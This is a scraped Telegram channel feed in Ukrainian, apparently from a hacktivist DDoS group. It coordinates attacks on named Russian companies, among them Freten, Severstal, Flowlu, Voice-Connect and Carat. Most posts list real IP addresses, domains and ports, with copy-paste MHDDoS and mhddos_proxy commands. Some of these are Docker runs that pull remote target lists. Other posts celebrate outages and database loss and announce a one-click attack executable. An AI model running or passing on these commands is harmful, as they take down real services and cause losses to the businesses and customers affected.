python3 start.py STRESS https://lk.carat-telecom.ru 6 1000 proxy.txt 10000 5000 true

python3 start.py UDP 31.31.196.124:53 5000 10000 true
(не рекомендую зараз)*

Команди для DDoS-Ripper:
(використовуйте інші інструменти, так як атака по айпі зараз не дасть ефекту, а по іншому DDoS-Ripper не вміє атакувати)

Update: 04:22
(нічні атаки доволі слабкі, атакують зараз десь 20 людей + сисадмін в караті сидить толковий, зреагував швидко)
**

Читать полностью…

Гайдамаки InfoDDoS-2

Доброї ночі, Гайдамаки, цей пост буде більш розмовного характеру💡

Сьогодні ми продовжили атаку на ЕГАИС, але поки що можу сказати одне — їх сервери були довго вимкнені і взагалі відгороджені від інтернету, так сказати, "закрились на ремонт", тим часом закрились ще два заводи-пивоварні, так як продукція стоїть на складах, а вивезти її не можуть... Поки що я слідкую за ситуацією там і вже вранці точно зможу сказати, що атакуємо далі, думаю, що б такого цікавого підготувати рашистам на 9 травня😏

А зараз відпочивайте)

Також, хочу сказати, що ми готуємо автоматичну програму для запуску кібератак на Windows (це для тих, хто боїться запускати консоль/термінал). Все, що вам буде потрібно зробити, — це запустити ".exe" файл. Все. Атака буде йти. Більш детальнішу інформацію ви отримаєте згодом, але сам факт полягає в тому, що атакувати зможуть навіть люди, які далекі від ІТ і не знають "шо куди жати і шо це за команди якісь на каналі". Навіть ваша бабуся запустить атаку😁

Для тих, хто з комп'ютером взаємодіє частіше — я закінчую працювати над інструкцією ддос "DDoS від А до Я", основний інструмент — це mhddos і його модифікації. Так як це найпотужніший інструмент на даний момент.

ЗБІР о 12.00!

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго вечора, Гайдамаки!

Продовжуємо атакувати Фретен біржу. Сервіс працює, але з перебоями. Іноді буває, що ддос гуард вічно грузиться, але ніяк не прогрузиться, іноді сайт з'являється, але без CSS... Коротко кажучи, ми молодці, атаку не зупиняємо, результати дуже хороші😁

Також зараз не рекомендую ігнорувати тривоги, кацапи бушують...😓 І не розповсюджуйте інформацію "шо де в кого бахнуло", я звертаюся до всіх вас, так як ви перебуваєте в багатьох чатах, і навіювати паніку не потрібно.

Читать полностью…

Гайдамаки InfoDDoS-2

Знову всіх вітаю, сподіваюсь, ви готові?😏

Атакуємо російську фріланс біржу Фретен — не найпопулярніший сервіс, але через нього теж багато людей працюють, і потік грошей там великий. Такі сервіси, зазвичай, платять налоги в держ. казну РФ, а значить фінансово підтримують ворога. Думаю більше розповідати тут нічого. ЧАВИМО РАШИСТІВ🤬

freten.ru
robroy.ru
37.46.131.229
[21/TCP, 22/TCP, 443/TCP, 1500/TCP]
—> сайт*
[53/UDP, 123/UDP]

mail.freten.ru
mail.robroy.ru
37.46.131.229
[25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3]
—> пошта*

82.146.43.2
94.250.248.160
[53/UDP]
—> DNS-servers*

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table

Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table

Команди для MHDDoS:

python3 start.py UDP 37.46.131.229:53 5000 10000 true
python3 start.py UDP 94.250.248.160:53 5000 10000 true
python3 start.py UDP 82.146.43.2:53 5000 10000 true

python3 start.py UDP 37.46.131.229:123 5000 10000 true
(тут синхронізація часу(123 порт), тому не пріорітетна команда)*

python3 start.py STRESS https://freten.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://robroy.ru 6 1000 proxy.txt 10000 5000 true

python3 start.py POST https://mail.freten.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://mail.robroy.ru 6 1000 proxy.txt 10000 5000 true

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго ранку, Гайдамаки!💡

Сьогодні ми атакуємо сервери компанії Северсталь(severstal.com). Це доволі важливий сервіс, який постачає метал (і не тільки) по всій країні окупантів, також в них є багато дочірніх компаній, до яких руки теж дойдуть😏

Сервіс дуже стійкий, тому потрібна максимальна ваша активність. Поки немає що розказувати — до бою:

217.175.24.79
[443/TCP] —> IIS server*
217.175.23.242
[443/TCP] —> IIS server*
217.175.23.8
[443/TCP] —> IIS server*
217.175.24.189
[443/TCP] —> IIS server*
217.175.24.192
[443/TCP] —> IIS server*

217.175.24.93
217.175.24.74
217.175.24.39
217.175.24.21
217.175.24.200
[443/ssl-TCP]
—> сервери аутентифікації користувачів в особистий кабінет (функція HTTP API також на цих айпі)

84.38.185.177
[21/TCP, 22/TCP, 80/TCP, 443/TCP, 5432/TCP, 9100/TCP]
—> PostgreSQL DB (висить БД)

217.175.23.3
217.175.23.4
[53/UDP]
—> ISC Bind v: 9.3.6-P1

217.175.18.117
13.80.145.65
217.175.25.190
[53/UDP] —> DNS-servers

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table


Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

Команди для MHDDoS:
python3 start.py UDP 217.175.23.3:53 5000 10000 true
python3 start.py UDP 217.175.23.4:53 5000 10000 true

python3 start.py UDP 217.175.18.117:53 5000 10000 true
python3 start.py UDP 13.80.145.65:53 5000 10000 true
python3 start.py UDP 217.175.25.190:53 5000 10000 true
Атака на Северсталь буде довгою, але хвилями — тому запасайтесь терпінням😉👌

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго ранку, Гайдамаки!⚔️

Сьогодні атакуємо вже сервіси Фловлу. Це сервіс-органайзер для бізнес планування. Він складається з різних "боксів", які виконують певні функції — синхронізація заміток, канали пошти, синзронізація з різними онлайн-гаманцями, планування подій, архіви для файлів і ще багато різних ніштяків😏

Важливі порти для атаки — поштові. Як я вже казав в попередньому пості: "Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід"

flowlu.ru
www.flowlu.ru
178.170.244.102
[all ports
filtered] —> все фільтрують, по тсп не атакуємо тут*

mx.flowlu.ru
95.213.248.77 —> висить їх БД
[22/TCP, 3306/TCP,
9100/TCP(filtered), 9998/TCP(filtered)]

legal.flowlu.ru
complitech.flowlu.ru
artgorka.flowlu.ru
acorn.flowlu.ru
labx.flowlu.ru
hc.flowlu.ru
flamingo.flowlu.ru
ironplastgroup.flowlu.ru
relgroup.flowlu.ru
ginoice.flowlu.ru
ronavi.flowlu.ru
pipe.flowlu.ru
my.flowlu.ru
trustyhost.flowlu.ru
37.200.70.155
[22/TCP, 25/TCP]

DNS-servers:
ns1 —> 31.177.80.41 [53/UDP]
ns2 —> 89.111.166.6 [53/UDP]

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table


Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table

python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table

Команди для MHDDoS:
python3 start.py UDP 31.177.80.41:53 5000 10000 true
python3 start.py UDP 89.111.166.6:53 5000 10000 true
python3 start.py STRESS https://flowlu.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.flowlu.ru/register 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/services/tasks/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/prices/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/blog/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://178.170.244.102/phpmyadmin/ 6 1000 proxy.txt 10000 5000 true
Сервіс доволі вразливий, одразу видно, що його не атакували взагалі. Що ж, потрібно виправляти😊

Update: 17:58 —> статичні команди відновлено. Нажаль, всі вразливі порти почали фільтрувати, атакуємо до вечора, далі ціль на ніч**

Читать полностью…

Гайдамаки InfoDDoS-2

Update: 11:07 —> тимчасово використовуємо старі команди, прописані вручну — статичні команди для атак накрились**

Читать полностью…

Гайдамаки InfoDDoS-2

Доброї ночі, Гайдамаки і Гайдамачки!😁

Вітаємо з Великоднем! Сподіваюсь, що сьогодні ви добре відпочили, так як таргетів не було — рахуйте, що це аванс, так як відпочивати під час війни ми можемо рідко😴

Минула наша атака на сервіси Неофона не була марною. Зараз вони вже стали на ноги, хоча сервіс пів доби лежав мінімум і багато бізнес компаній не мали до нього доступу=втрата грошей. Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід.

Далі, буде атака на ще один сервіс з бізнес сектору рашистів, цього разу вже не зовсім телефонія. Ціль вразлива і доволі велика, тому будемо атакувати спільно з іншою ddos-групою😜

Збір о 10 ранку! ВАЖЛИВА ЦІЛЬ!

Читать полностью…

Гайдамаки InfoDDoS-2

​​Гайдамаки, вітаю!

Звісно, щонеділі пишучи цей пост про вечір кіно, я хочу одного разу привітати вас з повною перемогою України. Всі ми впевнені та знаємо, що війна скоро закінчиться.
Ще один тиждень невпинної боротьби на кіберфронті підійшов до кінця.

Тому, поки орки грають у свої улюблені ігри "Розірвусь на шматки", "Знайди чорний пакет", "Хованки і Джавелін" або "Мама зніміть мене з дерева", ми пропонуємо вам знову вмоститися у кріслі з гарячими напоями та провести вечір у затишній компанії, переглядаючи фільм "Джентельмени". Як і завжди, перегляд фільму буде у перерві між вибором цілей.

Збір відбудеться о 20:30

Всім гарного настрою! Слава Україні!

Читать полностью…

Гайдамаки InfoDDoS-2

/channel/haydamaki_chat/57399

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго дня, Гайдамаки!🤗

Останні кілька днів ми атакували сервіси войс-конект, і, скажу вам чесно, атака вийшла доволі потужна, тривалістю в кілька діб — це фатально для бізнесу. Зараз їх компанія перейшли на клауд іншої бізнес-компанії, але таку ціль ми вже не подужаємо. В будь-якому випадку це призвело до паніки всіх їх клієнтів і зараз вони понесли великі втрати. Що ж, тоді продовжуємо роботу над бізнес-сервісами окупантів. Потрібно зменшити спонсорування війни рашистів. А також давайте нагадаємо, що ми зробили за останні кілька тижнів😊

Перша хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ТЕЛЕФІН:
Ми атакували Телефін. У цьому випадку, наслідками нашої атаки ворогом було витрачено доволі солідну суму грошей на QRATOR-захист. Цей тип захисту доволі ефективний, але також, одночасно з цим, — дууже дорогий😈

Друга хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ГРАВІТЕЛ:
Гравітел. Тут ми знищили основні, а також додаткові сервіси телефонії. Сервери не працювали кілька днів. У них був вибір: або втрачати кошти, поки сервіс лежить, або поставити захист, так само, як Телефін. Вони обрали перший варіант.

Третя хвиля атак Гайдамаків "Рейди на телефонії рашистів" — КАРАТ:
Далі атака на Карат-телефонію та Інсайд-тел. Саме в цей момент ці компанії обєднувались в одну (інтеграція Інсайда в Карат), ми трішки завадили цьому👌

Четверта хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ВОЙС-КОНЕКТ:
Найдовша атака була саме на сервіси Войс-конект — 5 днів. Чому так довго? В першу чергу нашим завданням було заставити їх зробити так само як Телефін, а саме витратити кругленьку суму на підтримку свого сервісу. Довго ми чекали, поки будуть хоч якісь дії.. І ось, сьогодні вони перенесли свою БД на клауд. На це вони теж витратили трішки грошенят.


Також була безрезультатна атака на Сбербанк (спільно з іншими групами), атака на аеропорт Іркутська, атака на росказну, ну і, звісно, доволі вдала атака Айті армії на системи маркування ЧЗ, в якій ми допомогли їм.

Але зараз основний акцент і вектор атак нашого угрупування — це бізнес сектор РФ! Чекайте вказівок. Ціль на ніч✨

Збір — 22.00!!!

Читать полностью…

Гайдамаки InfoDDoS-2

Увага!!! Зараз прошу всіх максимально атакувати по UDP!

Знаю, ви стомились атакувати 2 день підряд один сервіс, але лише точковими ударами, ми можем реально мати вплив на економіку рашистів👌

www.voice-connect.ru
voice-connect.ru
my.voice-connect.ru
billing.voice-connect.ru
home.voice-connect.ru

185.248.100.60
[22/TCP, 25/TCP, 111/TCP, 443/TCP]

77.244.214.121
[22/TCP, 25/TCP, 443/TCP]

95.163.87.128
[22/TCP, 1720/TCP, 3306/TCP, 5060/TCP]

195.88.209.73
[22/TCP, 443/TCP, 8080/TCP]

91.217.20.20
194.67.73.81
91.217.21.20
89.104.95.35
193.232.146.1
[53/UDP]

Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
(прошу зараз атакувати саме командою вище)***

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://home.voice-connect.ru http://home.voice-connect.ru https://my.voice-connect.ru -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table

Команда для mhddos_proxy:
python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
(прошу зараз атакувати саме командою вище)***

python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table

python runner.py https://home.voice-connect.ru http://home.voice-connect.ru https://my.voice-connect.ru -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table

Команди для MHDDoS:
python3 start.py UDP 91.217.20.20:53 5000 10000 true
python3 start.py UDP 194.67.73.81:53 5000 10000 true
python3 start.py UDP 91.217.21.20:53 5000 10000 true
python3 start.py UDP 89.104.95.35:53 5000 10000 true
python3 start.py UDP 193.232.146.1:53 5000 10000 true
(вище пріорітетні зараз команди)***

python3 start.py POST 95.163.87.128:3306 6 1000 proxy.txt 10000 10000 true

python3 start.py STRESS https://home.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://home.voice-connect.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.voice-connect.ru 6 1000 proxy.txt 10000 5000 true

Приходиться часто корегувати ціль, а це значить, що вони постійно стараються обходити наші атаки — тобто ми все правильно робимо, продовжуємо, поки не ляжуть повністю😉

Читать полностью…

Гайдамаки InfoDDoS-2

​​Ну що гайдамаки? Слава Україні.
Ще один продуктивний тиждень позаду. Останній тиждень було багато гарних подій.
Цього тижня руський воєнний корабель знайшов своє місце у цьому світі, а саме на дні моря.
Наші хлопці єб₴#₴ть ворога так, що він навіть у ві сні здригається холодними українськими ночами.

До речі ви знали, що з боку рашиської клоаки, крейсер Москва потонув через залишений недопалок? І вони це їдять😂Бойовий крейсер,флагман рашиської орди, з офіцерським складом 66 чоловік допустив, щоб один з орків ніби то закурив поряд з боєкомплектом. Робимо висновки панове. Вони постійно кричать про свою силу та мужність, а у самих постійно на фронті одна магія: кораблі самі тонуть, танки самі вибухають, жд шляхи самі ламаються, в решті решт їхня орда сама по собі гине. Так чим тут пишатися? За їхньою думкою ми, ще навіть нічого проти них не зробили😂Що ж буде коли ми за них візьмемося?

Тому на цій прекрасній ноті оголошуємо кіно-вечір знову. Пропоную заварити чашечку кави та прийняти участь у щонедільній кіно-зустрічі у нашому діскорд каналі. Пропонуємо у нашій теплій компанії переглянути досить цікавий фільм "Легенда". Та під час перегляду думкою лишній раз посилати рашиський воєнний кораблель, самі знаєте куди. Будемо сподіватися у пеклі їм більше сподобається ніж на нашій землі 🗡 🇺🇦
Звісно,як завжди , перегляд фільму буде в перерві між вибором цілей.

Зустріч о 20:30

Discord:
https://discord.gg/UyqBRprgZt

Перемога за нами🇺🇦
Слава Україні 🇺🇦

Читать полностью…

Гайдамаки InfoDDoS-2

Доброї ночі, гайдамаки!

Хочеться сказати, що атака удалась на славу😜
Зараз в них злетіла база даних, можливо вони навіть втратили багато інформації про своїх клієнтів)) Тому продовжуємо атаку, далі тримаємо їх довго, можливо кілька днів, або менше — залежить від ситуації, буду давати міні коментарі в постах з цілями біля часу апдейту (в кінці).

Все буде Україна! Нехай ця компанія відчує втрати і перестануть підтрмувати економіку окупантів🤬

Читать полностью…

Гайдамаки InfoDDoS-2

Доброго дня, гайдамаки😎

Сьогодні ми атакували дві компанії бізнес телефонії рашистів. Скажу прямо, ми не змогли добити їх повністю, але все ж таки інтеграцію однієї компанії в іншу зробити тепер буде важче. Адже ми повалили саме систему реєстрації і логіну в акаунти користувачів.

Тепер готуємо нову атаку, і цього разу попрошу зібратись з силами, адже ціль доволі вразлива і потрібно бити різко - поки вони не почали реагувати. Тому що атака на карат була вночі, коли кібервоїнів наших мало, а значить систему ми не встигли зафлудити.

Якщо коротко - ЗБІР В 22.00, ГОТУЙТЕСЬ😉👌

Читать полностью…

Гайдамаки InfoDDoS-2

Гайдамаки, увага!

Сбербанк почали фільтрувати і закривати всі порти, тому переходимо на атаку тільки по url. Команди в пості вище відредаговано, тепер там актуальна інформація.

Також, для зручності, коли пост відкореговано і команди змінено, — вкінці поста буде надпис, коли оновлено його. Це потрібно для того, щоб було легше орієнтуватись на актуальність інформації.

Продовжуємо атаку, якщо є питання, задавайте їх в коментарях, я їх всіх перечитую. Бажаю гарно повеселитись))

Читать полностью…
Subscribe to a channel